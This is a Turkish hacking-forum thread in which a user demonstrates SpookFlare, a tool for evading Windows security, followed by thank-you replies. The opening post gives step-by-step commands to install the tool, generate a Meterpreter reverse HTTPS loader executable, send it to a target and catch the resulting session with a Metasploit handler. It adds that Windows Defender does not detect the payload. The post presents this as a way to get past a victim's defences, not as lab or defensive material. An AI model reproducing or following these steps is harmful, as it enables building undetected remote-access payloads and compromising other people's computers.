İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

SpookFlare ile Güvenlik Duvarını Aşın // Qwx

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.693
Konular:
107
Teşekkür (Etti):
90
Teşekkür (Aldı):
554
Ticaret:
(0) %
22-01-2019 22:47
#1
SpookFlare ile Güvenlik Duvarını Aşın // Qwx
SpookFlare

Merhaba, sizlere tanıtacağım aracın adı SpookFlare.
SpookFlare, günümüzde en fazla kullanılan işletim sistemi Windows da ki güvenlik önlemlerini aşmak adına yapılmış olan bu araç Python dili ile yazılmıştır oluşturulan payload da C# dili ile yazılmıştır. Ek olan yapımcısı bir Türk olan aracın 2.0 versiyonu ile 3 tane özellik kazandırılmıştır. Bu yeni getirilen özelliklerde PowerShell, Visual Basic Script ve Javascript ile yazılmıştır.

SpookFlare GitHub Adresi ;


https://github.com/hlldz/SpookFlare


Kurulum ;

İlk önce aracımızı sistemimize indiriyoruz.

Kod:
git clone https://github.com/hlldz/SpookFlare.git




İndirme işlemi tamamlandıktan sonra dosyanın içerisine girip pip yüklememizi gerçekleştireceğiz.


Kod:
 pip install -r requirements.txt




Evet indirme ve kurulum adı altında tüm işlemlerimiz bitmiş bulunmaktadır. Şimdi sırada aracımızı çalıştırmak ve kullanım hakkında örnek göstermek olacaktır.


Kullanım ;



Kod:
python spookflare.py





Kodu ile aracımızı açıyoruz. help kodunu yazdığımız zaman bizim karşımıza hangi komutların var olduğu çıkmaktadır. list komutu ile bu araçta neler yapabileceklerimizi görmekteyiz.

Biz bugün örneğimizde .EXE Meterpreter Reverse HTTP and HTTPS loader uygulamasını göreceğiz.


Kod:
use 1



Ardından info komutu ile bizden hangi parametreleri girmemiz istenmektedir bunu öğreniyoruz.





Evet bizden 5 tane parametre istemektedir. Protocol, Local host, Local port, İşletim sistemi biti ve Met.asploit'i entegre ettiysek onun boyutu. Bunların girişini yapıyoruz. Met.asploit'in boyutunu öğrenmek için;
/usr/share/****sploit-framework/lib/msf/core/payload/windows/x64/
bu dizine giriş sağlıyoruz ve meterpreter_loader.rb 'yi açıyoruz. Ardından en aşağıda olan #dll kısmındaki byte değerini okuyoruz.



Kod:
set PROTO https
Kod:
set LHOST <ipaddres>
set LPORT 443
set x64/x86
set SSIZE <int>
generate




Kodlarımızı tamamladık ve payload'ımız oluştu. Şimdi oluşturduğumuz payloadı karşı tarafa atıyoruz ve Met.asploit üzerinden dinlemeye başlıyoruz. Met.asploit üzerinden oluşturduğumuz payloadı dinlemek için;


Kod:
use exploit/multi/handler
Kod:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <ipadress>
set LPORT 443
run







Karşı taraf bizim payloadımızı açtığı zaman bize bilgiler gelmektedir. Ek olarak Windows Defender payloadımız da herhangi bir virüs algılamamaktadır.





Bir araç tanıtımımızın daha sonuna gelmiş bulunmaktayız. Bir sonraki araç tanıtımında görüşmek üzere esen kalınız.
---------------------
A hacker does for love what others would not do for money.
Konu Qwx tarafından (17-03-2019 19:35 Saat 19:35 ) değiştirilmiştir.
ClayHackers2111 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Mesajlar:
140
Konular:
52
Teşekkür (Etti):
18
Teşekkür (Aldı):
3
Ticaret:
(0) %
22-01-2019 23:50
#2
Eline sağlık güzel konu olmuş
RooTGHoST - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2018
Nereden:
38
Mesajlar:
1.446
Konular:
38
Teşekkür (Etti):
446
Teşekkür (Aldı):
265
Ticaret:
(0) %
22-01-2019 23:53
#3
Elinize Sağlık Emek Verilmiş Bir Konu Olmuş...
DarqRisus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
Nereye
Mesajlar:
164
Konular:
14
Teşekkür (Etti):
10
Teşekkür (Aldı):
12
Ticaret:
(0) %
22-01-2019 23:59
#4
Eline emeğine sağlık dostum.
--------------------- C# %39
Python %16
sessizlik235 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Mesajlar:
93
Konular:
12
Teşekkür (Etti):
0
Teşekkür (Aldı):
6
Ticaret:
(0) %
23-01-2019 00:01
#5
teşekkürler çok yararlı bir konu olmus eline sağlık
--------------------- SORUNU BENİM HAYATIN.
YİNE DE YENİDEN HAYIR DERİM.
YERDE DEĞİLİM BAYADIR.
YERDE KALAMAM BEN.
GERİDE KALAMAM BEN.
ONA BİR GÜN YENİLİP YENİDEN ÖLÜCEM.
Bİ GÜN BENDE BELKİ.
BELKİ PES ETCEM.
AMA BUGÜN DEĞİL!
AMA O GÜN BUGÜN DEĞİL!
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.693
Konular:
107
Teşekkür (Etti):
90
Teşekkür (Aldı):
554
Ticaret:
(0) %
23-01-2019 18:53
#6
Alıntı:
ClayHackers2111´isimli üyeden Alıntı Mesajı göster
Eline sağlık güzel konu olmuş
Alıntı:
RooTGHoST´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık Emek Verilmiş Bir Konu Olmuş...
Alıntı:
DarqRisus´isimli üyeden Alıntı Mesajı göster
Eline emeğine sağlık dostum.
Alıntı:
sessizlik235´isimli üyeden Alıntı Mesajı göster
teşekkürler çok yararlı bir konu olmus eline sağlık
Çok teşekkür ederim. .
---------------------
A hacker does for love what others would not do for money.
MrTarget - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Mesajlar:
199
Konular:
28
Teşekkür (Etti):
42
Teşekkür (Aldı):
14
Ticaret:
(0) %
23-01-2019 19:47
#7

Eline sağlık.Yararlı konu olmuş.
Faydalı
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.693
Konular:
107
Teşekkür (Etti):
90
Teşekkür (Aldı):
554
Ticaret:
(0) %
23-01-2019 22:17
#8
Alıntı:
MrTarget´isimli üyeden Alıntı Mesajı göster

Eline sağlık.Yararlı konu olmuş.
Faydalı
Çok teşekkür ederim . .
---------------------
A hacker does for love what others would not do for money.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team (Kıdemli)
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
3.864
Konular:
352
Teşekkür (Etti):
606
Teşekkür (Aldı):
1347
Ticaret:
(0) %
23-01-2019 22:18
#9
Elinize emeğinize sağlık albayım. Güzel bir konu olmuş.
---------------------
SolidStar

Twitter Telegram

"Yaratıcı zihinlerin kaderidir yalnızlık."

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı